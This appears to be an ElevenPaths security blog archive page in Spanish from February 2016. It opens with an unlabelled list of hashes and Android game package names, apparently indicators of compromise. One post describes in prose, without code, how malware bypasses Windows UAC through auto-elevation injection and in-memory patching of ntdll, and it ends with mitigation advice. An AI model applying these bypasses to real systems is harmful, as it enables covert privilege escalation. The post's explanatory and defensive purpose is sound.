5d88d9053ffd33ad7b0d9f1a5407adc8bf290741,com.gg.can.knockdown.striker.free 0bedb09858009ecc894db92dc35110ba4cdb7b91,com.Gp_EmpireRogue_a1 7bc41bfbfe6e1a33eb026d62c7d025903e7b9850,com.royal.feather.running.circle.ultimate.game 135a309b8bc0f65b5a4096fc74598375604bc01b,com.transport.industrytrans 48b2c45aa1e1deb4a8a07ae56eab607512aaac53,com.Gp_RealFuriousRacing3D_b2 725e960ae4546c4a914f20d4cbfe0ba2e07d2113,com.gamevillage.candyfriendsdelivery 2fe571cbfc198cc6ac911d1b6830bf5f9214a38e,com.GameValleyStudios.RivalsRacingFever 49438cc6508a0737a674c698e6967ee5c984695d,com.GameValleyStudios.MonsterTruckRacingUltimate 66ff558b39761bc006b53c765695492e97310f65,com.GameValleyStudios.RivalsRacingFever 0c3b5eef556398c7649dcc92a570abd3337af14f,com.bgate.threefighters 72d29e214c73325d5f4e0e1a2f293644ce64a0a2,com.renkmobil.coconutsurvivorisland e47f2c8326938c4a61b7cb4252ef2e39785d0eb7,com.fazzidice.poo.free.gp e847fd3f69f681c21832b11a4f263e3452b47afe,com.wao.ninjamaster 744c797c7e68bb55d950dbdb25a972fefe348b65,com.injoy.jewel.blast.vampire e1dcec3563a3ecbb92944c250dd7af01b03b1bc9,com.gamechefs.basketball_shoot adb688d06f5e342b7478250df48703c828e1c6ee,com.call.tankbattle2189.honorblood 49ad3db8c6f5df287b86990259a49eeeac3ad375,com.kyxl.tybjd.egame a85c97a5d3551bab5bb13edee7db341cbfdda7e8,com.xcq.magiccandy.free 4cce1841789a49854856977fee9be349a2547e46,com.gamevillage.policevscrime 6da51e7c842b3b0b7ae19569c996c391a522f847,com.call.tankbattle2189.honorblood fc88afa8bd48fb652944f4ba297656fa94e5a873,com.gamevillage.tossthepaper a768f63286e74ff6eb7108f9b434b9495a6c4aa4,com.xcq.zombiekillerde.cn fb21ff1070171674a9cc48b9e6d5709a9de39374,com.xcq.tokdalang.free 2fb229ed623255d86d2549d3b922a8379735e411,com.CroHack.AcrossTheSky f1fe02de263d664eb386b2834a62705cfc27761e,com.baozi.herocrush.game 55fa44c9927e0bbfecfe883002bcdb809d0923b3,com.Gp_BubbleShooterSea_b2 f68d9a0e1e98ee805aa3fe783b8fd81e2331730f,com.playpax.monstershooting ce83481b7f2e3e7128275faf9b67076d35112237,com.uglygames.mystery.land.hidden.object.free 02431006f5ef41d9d23f2d8aa0a4cebfd958a3a6,com.crazy.turkey.run.game2 349416816a1ccbabe55f57db61e129bbd62183d6,com.zqbgames.soulhero.madone.crazy e227e8f021162d106695029aa97a0dcbd679e21f,com.xcq.bubblefairy 8fc000f2ac594a69cd8f40f53c153e3f69d9982f,com.bestorcishinfo.xmxsr.tll b95738db6f8ff6d051272a51f54020f29796b655,com.xcq.journeywestminer.cn d340589598f2b6ca1395dc0685157a53af92a518,com.rae.Rush3D.Racing.games44 2833773c4366c41ed3afa4383318d8e0187887e5,com.xcq.journeywestminer.cn c6488dba60f909483b453a09b4ea359ec8ca8f1a,com.apptang.plumber 88b072f55d49ba9eebd9d8025e2dbc8d4f7bf180,com.real.tankwar.battlegame.freeEN3D 7ec2b00a00909dee775ac13574c0d079a9605d4e,com.bird3D.topgame8000 92a7697613d0ac4026c314fde6d01d98d6fb7338,com.TheShape.jjf.gam.ivna 29e12fd0a0f6a4158ffe2db46cbebd6dd19f700d,com.Gp_FunnyChickenRun_c3 f9200e62d84daa2878658c9f272553092d55a0af,com.gg.mountain.truck.cargo.offroad.rider ba2f674c9253a1cad8009b138df2174b4a067431,com.gamingbots.endless.runner aeb007f2fc22720fe2700ccb69b7903963e0f168,com.optimuslab.creepbox 226e932e9d4512552669432053510f81e8257f08,com.tessconnect.android 32a0924c8190310f31752a127044d5ed54510296,com.gg.candy.shooter.candycrush.frenzy 07dadf4e371fe1a581db4a2c15c8781d138f74a1,com.Best.Sniper.Crazy.newgames40172 6d63748b46edb7914c712c4de35fd8550e319445,com.xcq.clansrunner 826bcb9df5f76c473efbc17c1da6534672563afb,com.niobiumstudios.feedthespider 3cdd8ad5691bf87e3b3741ba4e2162465fbd6943,com.smartgf.dont.touch.angry.spikes f85f27c8bae3d1d03800014169defd8dd9676cbf,com.jetpack.adventure.viral.game.free 0c033f30c76b425fcda8c497a4db4fa2f6c1ace7,com.optimuslab.ontheline f7579c89bfb4ce3b9b74c014bfbc7ad4def0686c,com.optimuslab.infinitebounce 2e17ce11d4ef3f5671f60586c99c24c96bdeaae9,com.gteam.flyingninja 9990e74e80986a4e68086677380d5899feec77b5,com.GameValleyStudios.RivalsRacingFever bc06370dbe797bb3eb1b6c2262fa68133693b2e4,com.lt_phoenixxx_games.free_game 40045f9c3e560b276aa665a8d7915301c078f69c,com.Gp_funnypetsmania_c3 86bf73d3208d1fe874aced12cc5e6c4f41f9f119,com.iceball.redim 39b1dd7980392a99ab58d97acead3b48a7230f91,com.logicalbots.sven.sniper dfc11e373d841fd1ed134937279ce38702cd2361,com.Gp_lovelycrushsaga_c3 8a26f9090b6c37e0e167611632b85a2271aac79a,com.Gp_SavePetsSaga_b2 86cc22af7945ec5cb26703ec703f1e8e48dd5087,com.fastSportscar.streetraceJP 7bb309ab685cc3414bfb2ea093761d83f3d9fed1,com.sugastudio.blocky.racer.v2 de8d19dc3bcd46f884a018ad32ba1c5be59562f7,com.motiongames.loveydovey 8723543a18aa34e7e47d5b1947f31ca6448bb06f,com.bepublic2.qmttss 91087dc8ec978c0a195eafed45cb30f0c214cb43,com.bepublic2.qmttss 485e9abc6e5d24dd0e6abac2b817345889281ea1,com.Cat.Sky.Battle156.gametop be1a8f8c81bc6d5387d1be92ca27b057a00d1f88,com.ts.colorchain 05ec16f5dfc45121cad6436b44754f54d53a730d,com.Zombie.shooter.speed.loier ff7d61010658c96510df7b4efc33deea830ca9af,com.CroHack.SpinRush 43180937ad807a622cf04fea06d1e1a43606d268,com.ts.ninjajump a789e4528268414b3bed3b167e08754262dd2052,com.CroHack.SpinRush 01f665d97868a1e81a68f97c71cc6297b24137d2,com.sm.metroparking 89b768efa83aa5e03e05973568834a3d27bcbdf0,com.linkpop.android.coocent 013b69d445704e906e09a5953820f57f1797bce9,com.war.Dragons.hd.gamefree40142 a0de79db517e52ac6c5acc5d128a45ca67e2fc5c,com.xcq.seahunter 7ecedeb1e9e2009f955e2b6d02fd129b88ec9878,com.Speed.racer.Motorancing.dosuejas 119ac13eb4c3b79db02f17827205d95004091557,com.Speed.racer.Motorancing.dosuejas c79d913631600306c963076aa8acedaa27c7d292,com.windflow.whltwf e200495affdd4959c9b8b52e3e6557c1622c8919,com.xcq.thunder 365e40486ee91631a56053673ecb5124881afd7e,com.funcolor.hipposim 259ddb3047d8027105c512c316e8260baa4fb431,com.xcq.seahunter.cn e4169fe5cfa2f2a8cc0a41477d5256172d2dc42c,com.Dream.Bubble.Shooter8017 da1ff9b3b4315c8b41191cb81e0647cf91d1feaa,com.ledun.jewelmatchsagadeluxe 9115e9aa528225bf9fb05ef9205b63db219c8255,com.gamefast.speed.car.racing8010 fcbcac4598a5695a1b6bf124349a49c38d891d3a,com.candygame.candy.frenzy 69efd2df846a7861d70322750a4c1ad602391056,com.funcolor.fruitshoot 6d3ad5d6b74c8a1dcbf02451f750b1a5cc17d822,com.crazypandas.firesoccer 4a61cd3eeff0bb4fc599350bc87e16e1b74aedd8,com.ts.fruityslot bd0229be5d8ff65d8b09de1cb1803a1dceb407ac,com.xcq.journeywestminer 4a30e9a4090f06decf48ddca115214948b6ccac7,com.lt_phoenixxx_games.free_game 1b230c6dc1d12e72fd7d93e2a84414bfc9bba9da,com.LeSquare.PandaRush 40d31feac95fd47b572e1ee739b75e9ed3504a76,com.gamevillage.mototraffic 318c2f63a8687542fc647783e2fd633fee2d86c2,com.xcq.happyluwak.cn 2caafeb7920f9a1164468a96ee8f23034e907cdd,com.xcq.zombieraider 454a3cdaaf4a933e5047246cb8b24829d5613749,com.BringItOnGames.CitySpeedRacing 8f678dd7e3950d8f4360c94aba27d1fa69a2ffa9,com.Bird.pro.wang.sui.chunyubaisj 89045a4399a4f470d807574bdbac14ef0f03c065,com.coolbaoweishenmiao5 efc70d4ec38be6805e91ddcb2b8e1741b2182988,com.leakedproductions.zombiecrush 0ea42e3718987423058591c4ecaf643c9ad0fde0,com.homeless.crush.zombies 30f26d80808c7462e088f775c079489e93ffe881,com.xcq.sanguo 4ebef946626778393b7c7faeac6e35818c7a77ef,com.Eggs.Jump.firegames.fast.cat.lost 1a0eed824ee9f00c12ed55ebdfbcef68db89b532,com.walkdead.zombie d19a9fd2835bc84d97675bf0d82fca4cce01421c,com.gg.trail.dirt.bike.racer.game 0ea135d8a5f20a5829ea875c463a9a696e0b1b34,com.sugastudio.fairyrush 3e88452cc3c73198a33809c1aa4f1d72db0db040,com.smartgf.rise.of.the.zombies a9eee864980161941a7f0a4c8def3a0eb3b30778,com.ts.plusminus 7113e5cb1bac3c82e05b30d1f01212a9e6418b05,com.wao.ninjashadow 2ff24ee100fb0a7b9c7e073e2dbc3cd6bb855111,com.candygame.candy.kingdom.frenzy 94177c85044922009af21426505e669caadad1f7,com.xcq.spyingeye abf8d075334514b4fbd5347ca77960a1ff3df297,com.grom.bvz.letang.HeliumRush 8c04b9e6503a0724b01a765a41b37168a600ddc5,com.optimuslab.lift 04dd177cd45a7f048e0dbf19ba994b365d90b04c,org.cocos.ShengDan2016 1ca58c9745d2d92e0c1ef3ced7588d071b908480,com.xcq.thunder.aircraft e8a317d724baf0dbdbe8b7bffce17c4e73bc8af0,sk.halmi.smashandbreak bde6d1eb97dd94043d3e4bb03688be3272780d4d,com.niobiumstudios.feedthespider c826f8e104d572d17e1facd6090dc9b3b4a5bdb8,com.CroHack.HighSanta cb70b39e676116e915ac798dd60dbd59f9fd4a41,com.sugastudio.blocky.racer.v2 a3648c9f03b32ae55b785070dfb26d46e9277781,com.xcq.petscrush 61cedfdddd198ba40a9308493d793c9d977b40c8,com.xcq.dtqb.cn 319009734dce202afeb3274aba4a0b30de60405d,com.gg.can.knockdown.striker.free 819de10ccde2b95b1b1893dc6e044011c280f8bf,com.xcq.zombiekillerde.cn 1b4b602a70f7b75e0dbaf622dc028797097142f4,com.ThunderClapStudios.JourneyOfPandaSear 7238a309d516d25625088587e935e2ac910026f9,com.fazzidice.xrush3d.free d0d89f00be0e24f64ab1b3077607b3cd78285af9,gameeon.roadtrip.madphysics2 ddcdf585932a92720924ff29b72ba5d452698dcb,com.senspark.letanginc.tinymineradventure 3a4327c4694b3609d4b0b6832ed14c03c4704033,com.ledun.superspeedracer Sergio de los Santos ssantos@11paths.com @ssantosv
15 de febrero de 2016
![[ANTICIPO] Ven a conocer nuestras soluciones de seguridad para IoT en el MWC'16 de Barcelona](https://media.telefonicatech.com/telefonicatech/uploads/2021/1/6407_MWC_2.jpg)
[ANTICIPO] Ven a conocer nuestras soluciones de seguridad para IoT en el MWC'16 de Barcelona
Del 22 al 25 de febrero en el próximo Mobile World Congress en Barcelona, en el stand de Telefónica [Hall 3 Stand 3J20], presentaremos algunas de las cosas en las que hemos estado trabajando en los últimos meses, especialmente con Vamps, nuestro sistema de gestión de vulnerabilidades y nuestra tecnología de pentesting persistente Faast adaptado al mundo del IoT. Vamps y Faast hacia el mundo del IoT Es casi imposible pensar en un mundo sin dispositivos conectados y este nuevo mundo abre un montón de riesgos en la vida de las personas, pero también en las empresas y organizaciones, y por tanto hay que estar preparados para los riesgos que puedan suponer para la seguridad de las compañías. En el mundo de la empresa los administradores de IT y los responsables de seguridad se encuentran ante un nuevo rompecabezas para controlar la cantidad de tecnologías que se meten en sus redes o que circulan por sus oficinas día a día. Si a esto, le sumamos todos estos dispositivos conectados, configurados y manipulados muchas veces por los mismos empleados, con mayor o menor conocimiento técnico, se convierten en un punto muy importante. Debido a esto, en ElevenPaths hemos estado trabajando en adaptar los sistemas de autodiscovery de Faast, nuestra plataforma de pentesting persistente, para localizar el IoT en las empresas que auditamos de forma continua. Nuestra tecnología Faast ahora también permite detectar y analizar de forma persistente las nuevas vulnerabilidades de dispositivos IoT. Todo, con el objetivo de que se pueda controlar el Shadow IT y el Shadow IoT un poco mejor dentro de la empresa. Hasta aquí podemos leer. » [SABER MÁS] Nuevo Faast para IoT » [SABER MÁS] Conoce nuestras soluciones de seguridad para IoT Ven a conocer nuestras soluciones de seguridad para IoT en el MWC'16 de Barcelona, acércate al Hall 3 Stand 3J20 y conoce de primera mano a nuestros expertos y nuestras tecnologías. Participa en nuestras demos y vive en directo la experiencia digital segura. » Descárgate la nota de prensa *También te puede interesar: [NUEVO] Así funcionan nuestras soluciones de ciberseguridad para dispositivos IoT en tu empresa Nuevo Whitepaper "Alcance, escala y riesgo sin precedentes: Asegurar el Internet de las cosas" elaborado conjuntamente por Telefónica y el equipo de analistas de ElevenPaths New Whitepaper "Scope, scale and risk like never before: Securing the Internet of Things" by Telefónica and ElevenPaths Analyst Team Vamps: Recupera el control de los activos IT de tu organización Para más información elevenpaths.com
12 de febrero de 2016
EMET 5.5 sí es necesario en Windows 10, Microsoft confunde a los usuarios
Aunque EMET 5.5 ya lleva unos meses "en circulación" hace solo unos días se ha hecho oficial. Las novedades ya las discutimos, pero esta vez llama la atención el hecho de cómo lo han anunciado. EMET es absolutamente imprescindible en cualquier sistema Windows hoy día. Sin paliativos. Si han querido suavizar el mensaje, es por vender las bondades y mejoras de Windows 10 y Edge en cuestión de seguridad. Si bien son innegables, el mensaje lanzado llega a hacer pensar que Windows 10 es tan seguro que EMET no es necesario en él y así se está reproduciendo en titular en los medios. Esto no es cierto. Veamos por qué. EMET es una herramienta que hace fundamentalmente cuatro cosas: Sirve para hacer certificate pinning en Internet Explorer, que no lo soporta de serie. No es el mejor pinning del mundo (de hecho es bastante limitado), pero es lo mejor que tiene Microsoft de forma nativa al respecto. Mitigar ataques habitualmente usados para permitir que los exploits o payloads funcionen. Esto incluye ataques ROP y sus variantes, contra algunos aspectos de ASLR, ataque de carga de librerías remotas… etc. Además, fuerza el uso de mitigaciones en binarios que no lo han solicitado explícitamente durante la compilación (como ASLR y DEP) etc. Facilitar el uso, puesto que todas estas implementaciones y despliegues de mitigaciones, en algunos casos, requerirían tocar el registro en diferentes puntos. Con EMET se unifica todo en una sola interfaz. Por si fuera poco permite implementar mitigaciones que de otra forma no podrían realizarse en Windows, como el Attack Surface Reduction, por ejemplo. ¿Qué dice Microsoft? Según la presentación de hace unos días ( aquí) : With Windows 10 we have implemented many features and mitigations that can make EMET unnecessary on devices running Windows 10. EMET is most useful to help protect down-level systems, legacy applications, and to provide Control Flow Guard (CFG) protection for 3rd party software that may not yet be recompiled using CFG. Some of the Windows 10 features that provide equivalent (or better) mitigations than EMET are: “Device Guard. Control Flow Guard (CFG) and Applocker Given the advanced technologies used to protect Microsoft Edge, including industry leading sandboxing, compiler, and memory management techniques, EMET 5.5 mitigations do not apply to Edge." Estas afirmaciones necesitan tantos matices (y una incluso es directamente un error), que iremos por partes. ¿Qué no dice Microsoft o por qué es matizable? Afirmación 1): Es cierto que Windows 10 mejora mucho la seguridad introduciendo funcionalidades muy interesantes. Sin ir más lejos, la posibilidad de bloquear la carga de tipos de letra no fiables (algo muy usado en ataques) solo funciona en ese sistema operativo. Y Control Flow Guard, también funciona solo en Windows 10. Pero para que CFG funcione en Windows 10 y efectivamente proteja de las técnicas de exploiting, no solo el sistema operativo debe soportarlo sino que también las aplicaciones deben estar compiladas para hacerlo. Exactamente igual que ASLR y DEP. Se afirma que " and to provide Control Flow Guard (CFG) protection for 3rd party software that may not yet be recompiled using CFG. Pero EMET no permite proteger ejecutables para que, aunque no nativamente compilados para ellos, se cobijen bajo el paraguas de CFG y sean más complejos de explotar en Windows 10 en caso de vulnerabilidad. De hecho, EMET no tiene nada que ver con CFG. Lo que sí es cierto es que EMET está compilado con CFG para animar a terceros a que hagan lo mismo. En resumen, se han equivocado. Esta imagen lo resume. En la primera, de este año, se afirma algo incorrecto. En esta segunda, de presentación de la Beta en octubre, se dice de forma correcta. Durante la redacción del comunicado de prensa, parece que en algún momento alguien se equivocó. La presentación de la beta de EMET 5.5 sí es correcta. EMET puede servir para ofrecer una mejor protección anti-ROP a aplicaciones que todavía no están compiladas con CFG. Como curiosidad adicional, ¿cuántos ejecutables de Windows 10 vienen compilados con CFG? Muchos. Con ayuda de un pequeño script hemos podido comprobar que la inmensa mayoría de binarios iportantes en Windows así están compilados. Pero ¿qué pasa con otras aplicaciones muy comunes? Lo cierto es que solo hemos encontrado una aplicación de terceros popular que esté compilada para usar CFG… Flash. Curioso. Por tanto, la inmensa mayoría del software común no está compilado para usar CFG (y pasará tiempo hasta que lo hagan, igual que ocurrió con ASRL y DEP). Así que EMET sigue siendo la mejor alternativa antiexploit para ellos... incluso en Windows 10. Afirmación 2): Se dice que Windows 10 dispone de funcionalidades mejores o equivalentes a EMET como Device Guard, CFG y AppLocker. Esto es comparar huevos y castañas. Device Guard es una especie de AppLocker muy avanzado, e impide la ejecución de software desconocido. ¿Qué tiene eso que ver con la mitigación de exploits? Nada. De CFG ya hemos hablado, y efectivamente, como técnica antiexploit puede ser muy interesante y superior a lo que ofrece EMET, pero hasta que el software popular la adopte, solo tenemos las técnicas anti-ROP de EMET. AppLocker, por su parte, fue introducido en Windows 7 hace siete años, y no ha gozado de gran popularidad desde que se lanzó, aunque es una buena herramienta para seleccionar exactamente qué ejecutar y qué no en entornos muy restrictivos . No tiene nada que ver con EMET, y no son funcionalidades ni mejores ni equivalentes, simplemente incomparables. Afirmación 3): Edge mejora mucho la seguridad de Internet Explorer. Usar AppContainers para aislar los procesos lo pone a la altura de Chrome en su tecnología de sandboxing (aunque está por ver que lo supere). Es cierto que AppContainers se puede utilizar con Internet Explorer (lo que ocurre es que nadie lo hace), y esto aumenta su seguridad enormemente. Afirman que Edge implementa de serie todas las mejoras que impone EMET. A falta de un estudio más riguroso, esto estaría por demostrar. Además, se dan dos situaciones paradójicas: Es más que probable que alguien eluda la sandbox de Edge en un futuro, como ocurre de vez en cuando con todas. En ese caso… echarán de menos a EMET, que es la herramienta que siempre se ha recomendado para cuando precisamente se den estas situaciones. Al no permitir que Edge aproveche la parte de certificate pinning de EMET… el navegador se queda sin HPKP ni Certificate Transparency… no ofrece tecnología nativa para implementar certificate pinning. Con lo que se convierte en un navegador muy seguro pero con pocas funcionalidades relativas a los certificados. Conclusión Las palabras del anuncio por equivocación u omisión, confunden al usuario (para que su percepción de Windows 10 mejore), haciéndole pensar que Windows 10 (y en concreto Edge) es tan seguro que EMET no sería necesario y que por sí mismo contiene grandísimas mejoras de seguridad. Y es cierto: Windows 10 contiene grandísimas mejoras en seguridad, pero EMET es igual de necesario para proteger no solo el sistema en sí, sino todas las aplicaciones en él. Y esto no es ni bueno ni malo, pero inducir al usuario a pensar lo contrario, es contraproducente. Creemos que se envía además un claro mensaje oculto en este anuncio, que es más un deseo futuro que una realidad hoy por hoy: es evidente desde hace tiempo que toda la tecnología de mitigación de EMET será incorporada al sistema operativo poco a poco… cada vez parece más claro que EMET es el laboratorio en el que Windows experimenta antes de pasar las técnicas al propio sistema operativo, y que probablemente esta será la fórmula en la que EMET será introducido poco a poco de forma nativa en el los sucesivos Windows, no como aplicación de serie. No se sabe. Pero todavía queda camino por recorrer para que EMET sea de verdad recomendable solo en ciertos sistemas Windows. Sergio de los Santos ssantos@11paths.com @ssantosv
9 de febrero de 2016
Hackathon Sinfonier Project en la ETSII de Granada
Apunta en tu agenda los días 17 y 18 de febrero. Por que se va a celebrar un Hackathon de Sinfonier en la ETSIIT de Granada al que se invita a todo el mundo a participar, para ello sólo hay que inscribirse y venir con muchas ganas de llevar a cabo alguna de esas locas ideas que a todos se nos han pasado alguna vez por la cabeza Este evento organizado por Telefónica y ElevenPaths y la ETSIIT de Granada pretende ser un punto de encuentro entre Universidad y Empresa para identificar el talento a través del desarrollo de aplicaciones de BigData orientadas a las Smart Cities, Economía Digital e Identidades Digitales. Si queréis sacarle todo el jugo al evento y tener una ventaja sobre vuestros compañeros, conviene que antes de venir, os familiaricéis un poco con Sinfonier, ¿y cómo se puede hacer esto? A lo largo de los años que llevamos trabajando en Sinfonier hemos ido escribiendo algunas guías y ejemplos de cosas que se han hecho, así que es una práctica recomendada echarles un ojo. Para empezar, tenemos el Sinfonier Quick Start, dónde se explican conceptos básicos acerca de qué es Sinfonier y los elementos que lo componen, esos Spouts, Bolts y Drains que van a permitir hacer magia dentro de una topología. Además para ir más rápido en el desarrollo y pruebas de los módulos, se recomienda traer instalada la “Development Virtual Machine”, se trata de una máquina virtual que contiene todo lo necesario para desarrollar módulos tanto en Java como en Python, y que se puede descargar desde Google Drive e importarla en VirtualBox. Para facilitar el uso de la máquina virtual se han escrito dos artículos, uno de iniciación a la VM y otro ya con pruebas en la VM. Como en cualquier concurso, las dos mejores soluciones a los problemas planteados obtendrán premio. Un iPad Air 2 y un lote de 4 libros de 0xword pueden ser tuyos. Si todavía todo esto te parece poco, hay más. Te invitamos a participar en nuestros procesos de selección. Nos encantaría poder contar contigo en nuestro equipo. Trae tu CV actualizado si quieres formar parte del equipo. Apúntate y ¡recuerda traer tu propio ordenador! Nos vemos próximamente en Granada, y si no has tenido tiempo para jugar con Sinfonier o te has quedado con dudas, no te preocupes, en el Hackathon o a través de la plataforma, estaremos encantados de responderte. * También te puede interesar: Sinfonier y Telegram How to use Telegram modules? Creación de un bolt: He sido hackeado? 14.000 USD en BitCoins, un iPad Air 2, y libros OxWord por tus proyectos de seguridad
8 de febrero de 2016
La doble moral de los Metadatos: Protección o Violación
A raíz de los últimos acontecimientos relacionados con los “metadatos” donde los grupos islamistas sufrieron ataques precisos por parte de los servicios de inteligencia, estos mismos grupos han promovido publicaciones donde se hace hincapié en cómo protegerse ante las fugas de información a través de las telecomunicaciones. En la Unión Europea, tras los atentados contra la revista satírica Charlie Hebdo y a los últimos atentados realizados en Europa por miembros del “Estado Islámico”, ha quedado patente la importancia vital de los “metadatos” incluidos en las llamadas telefónicas, correos o archivos multimedia. Esto llevó a Angela Merkel, a presentar una directiva ante la Comisión Europea, que permitiera el almacenamiento de los “metadatos” recopilados como medida de lucha contra el terrorismo. Esto demuestra la clara importancia de estos “metadatos” en el conocimiento de los patrones de la vida privada de las personas, pero la gran duda es: ¿El almacenamiento masivo y control de los “metadatos” no podría violar los Derechos Humanos? Para responder a esta pregunta, demostrar la importancia de la información sensible, la cantidad de información y las costumbres de cada individuo que se pueden extraer a través de ellos, el político alemán Malte Spizt, permitió que se publicaran los “metadatos” almacenados durante 6 meses de la compañía Deutsche Telekom y llegaron a la conclusión de que un estudio de dichos “metadatos” podría llevar incluso a predecir el comportamiento de las personas. La NSA ( National Security Agency) de los EEUU canceló la recopilación de esta información según anunció el presidente de EEUU, Barack Obama, tras conocerse este modus operandi de la NSA y las declaraciones de Michael Hayden, ex director de la CIA y de la NSA: “ We Kill People Based on Metadata”. Tras esto surge la doble moralidad de si es necesario o no recopilar y procesar esta información y de si este procesado sirve realmente como protección o puede ser utilizado para otros fines indeterminados. Queda claro que el valor y la importancia de los “metadatos” está creciendo cada día más y los grupos terroristas ya saben del uso de los “metadatos” por parte de los servicios de inteligencia debido a las declaraciones anteriores y actuaciones destacadas como la realizada por el ejército norteamericano en la que un terrorista fue bombardeado a raíz de la detección de los metadatos incluidos en una fotografía subida a sus redes sociales que detallaban su ubicación. El resto de la población debemos estar informados de la necesidad de proteger nuestros “metadatos”, ya que pueden facilitar información de nuestras vidas privadas, entorno y exponernos sin necesidad. No hay que olvidarse de que esta información se puede utilizar de manera malintencionada y que los grupos terroristas al igual que los servicios de inteligencia, ya están tomando medidas para eliminarla o usarla en favor de su causa. Para protegerse lo mejor es no exponerse y para ello existen herramientas para la detección y eliminación de metadatos como Metashield Protector. Antonio Bordón antonio.bordon@11paths.com
4 de febrero de 2016
Un, dos, tres... formas de elevar hoy privilegios en Windows (y cómo las usa el malware)
Antes de Windows Vista, la inmensa mayoría de usuarios de Windows lo usaban como administrador para cualquier tarea. El malware no se preocupaba de elevar privilegios, excepto en sistemas de empresa bajo directorio activo, por ejemplo. Con Vista se introdujo el concepto de UAC, una especie de usuario por defecto con doble personalidad (usuario y administrador) que se comporta siempre como usuario excepto cuando se le da permiso pasando por UAC. En principio los ransomware no necesitaban privilegios para cifrar, pero ahora, cuando quieren borrar copias de seguridad o ser aun más persistentes en el sistema, deben elevar... y lo hacen. ¿Cómo? Existen varias filosofías diferentes para elevar privilegios en Windows. Veamos algunas. Es necesario aclarar que hay dos "tipos de posibles elevaciones" que, aunque comparten objetivo, no deben confundirse. El usuario por defecto en Windows ya es administrador, y en este caso el malware o el atacante lo que necesita o pretende, específicamente, es eludir UAC, esto es, evitar que aparezca la petición de confirmación o credenciales. "Elevar privilegios" de forma más pura, se trata de conseguir que un usuario sin privilegios disponga de los permisos para hacer lo que un administrador ya tiene concedido, sin UAC de por medio. El malware, según su sofisticación, intentará una u otra aproximación. Uno: Eludir UAC (la forma "clásica") Vista fue un sistema operativo fallido para Microsoft. Quizás demasiados cambios de una vez y un entorno poco maduro para unos usuarios mal acostumbrados. Una de las quejas más frecuentes era el uso de UAC, y la continua confirmación de acciones que iban a realizarse como administrador. En Windows 7 se "corrigió" con la introducción de "autoelevación" para ciertos programas del propios Windows que lo incluían en su manifiesto. No se pediría confirmación para ellos (puesto que se consideraban de confianza) y así el usuario percibiría menos peticiones y "clics". Por defecto, la autoelevacón vendría activada .Todo un error, puesto que no tardó en abrirse una puerta (que sigue abierta) para eludir UAC. Pero, si lo pensamos bien... ¿qué importa que un usuario/administrador pueda eludir UAC? ¿No es ya administrador? Además la mayoría usará UAC en modo "aprobación" (sí o no, sin introducir credenciales)... ¿Para qué elevar? Pues por ejemplo para que el malware borre sus "shadow copies" sin que el usuario lo perciba. Esta prueba de concepto sigue siendo válida. Poco después se liberó una prueba de concepto que permite aprovechar la autoelevación de ciertos programas (inyectándose en ellos), para que el usuario por defecto (con doble personalidad) lance un programa como administrador sin pasar por el UAC. Con más o menos cambios, esta fórmula sigue siendo válida para Windows 8 y posteriores, aunque UAC ha sido mejorado. Aun así, no parece que mucho ransomware utilice esta técnica. Dos: Eludir UAC (en memoria) En 2011 se publicó un método diferente para deshabilitar UAC en memoria. Cuando se llama a la API CreateProcess desde explorer.exe, esta llamada desencadena otra a CreateProcessInternal y a su vez a RtlQueryElevationFlags que decide si se muestra o no el dialogo de UAC. En una prueba de concepto disponible públicamente, se abre un explorer.exe que parchea esta función en la memoria de ntdll.dll, y se hace que siempre devuelva 0 independientemente del estado del UAC. Así, nunca se pregunta. Eliminando el diálogo de UAC en un Windows 7 totalmente parcheado. No funciona si el programa no se lanza desde explorer, pero esta aproximación es ya suficiente para el malware. En concreto la versión 3 de Cryptowall utiliza esta misma "solución" no solo para deshabilitar UAC, sino degradar la seguridad del sistema en general, sin que el usuario acepte ningún diálogo. Malware real pidiendo elevar privilegios. Parece muy legítimo (una peticion real del cmd deWindows) hasta que se miran los detalles. Tres: Elevar privilegios de verdad, a través de vulnerabilidades Independientemente de UAC, de vez en cuando en Windows se puede pasar de ser usuario a administrador, aunque el usuario pertenezca solo a este grupo. Esto es una "elevación pura". Habitualmente esto se consigue aprovechando vulnerabilidades, no fallos de diseño o problemas en la implementación. Las vulnerabilidades por definición suelen ser parcheadas, y ocurren varias veces al año. A veces son solucionadas antes de que se hagan públicas, y otras se lanzan sin previo aviso, como el caso de la reciente Hot Potato. Esta además cuenta con el problema de que aprovecha varios fallos, algunos de diseño que a Microsoft le va a costar mucho solucionar. El resto de vulnerabilidades suelen suceder en el kernel, y van y vienen a medida que Microsoft parchea pero se descubren nuevas. Estas vulnerabilidades no suelen ser aprovechadas por malware más genérico, pero sí que lo suelen usar los auditores, atacantes en redes internas o pentesters en general para sus movimientos laterales. Bola extra: Elevación por otras causas Hay otros métodos. Uno habitual es que un programa establezca permisos erróneos en el sistema, y un usuario pueda aprovecharlo para cambiar el ejecutable y que (quizás un servicio) se lance como SYSTEM. Esto también es habitual cada cierto tiempo, pero es más achacable al instalador o programador que al propio sistema operativo y además solo funciona si se tiene instalado ese software... aunque algunos portátiles pueden llevarlo preinstalado. Sin ir más lejos, tenemos un reciente ejemplo de hace días aquí. ¿Qué hacer? Evitar el uso de UAC, creando un usuario sin privilegios de verdad. Si se utiliza UAC, elevar su seguridad a "modo Windows Vista". Y para el resto de elevaciones... parchear y mejorar la seguridad del equipo en general (muchas se ven mitigadas si se toman las precauciones previas necesarias). Elevar la seguridad de UAC. Si no hay más remedio que usarlo, una posible mejora. Sergio de los Santos ssantos@11paths.com @ssantosv
2 de febrero de 2016
Día de la Protección de Datos: SandaS GRC
Esta semana se celebra el Día de la Protección de Datos en Europa y desde ElevenPaths te presentamos el módulo de Privacidad de SandaS GRC para facilitarte la gestión y el cumplimiento en materia de protección de datos. Nuestro objetivo es ayudarte a cumplir la privacidad actual y "la privacidad que viene". La protección de datos es un derecho fundamental ya recogido en la Constitución Española de 1978 y desarrollado en diversas leyes. Primero fue la LORTAD aprobada en el año 1992 y posteriormente la LOPD que data del año 1999 y que evoluciona, como comentaremos más adelante, según la Directiva 95/46 que constituye el paraguas de la privacidad europea. Esta visión común a Europa ha supuesto no pocos “desencuentros” con otros países, particularmente con EE.UU, como se ha puesto de relieve recientemente con el tema de safe harbor. Durante estos años se ha constatado una importante evolución. Por un lado, el consiguiente aumento en la concienciación de los ciudadanos sobre este derecho; Y por otro lado también el de las organizaciones, tanto públicas como privadas, obligadas a cumplir dicha legislación. SandaS GRC es nuestra herramienta de Gobierno, Gestión del Riesgo y Cumplimiento Normativo que te permite valorar y gestionar el riesgo que suponen amenazas y vulnerabilidades para tu negocio así como la capacidad para gestionar las 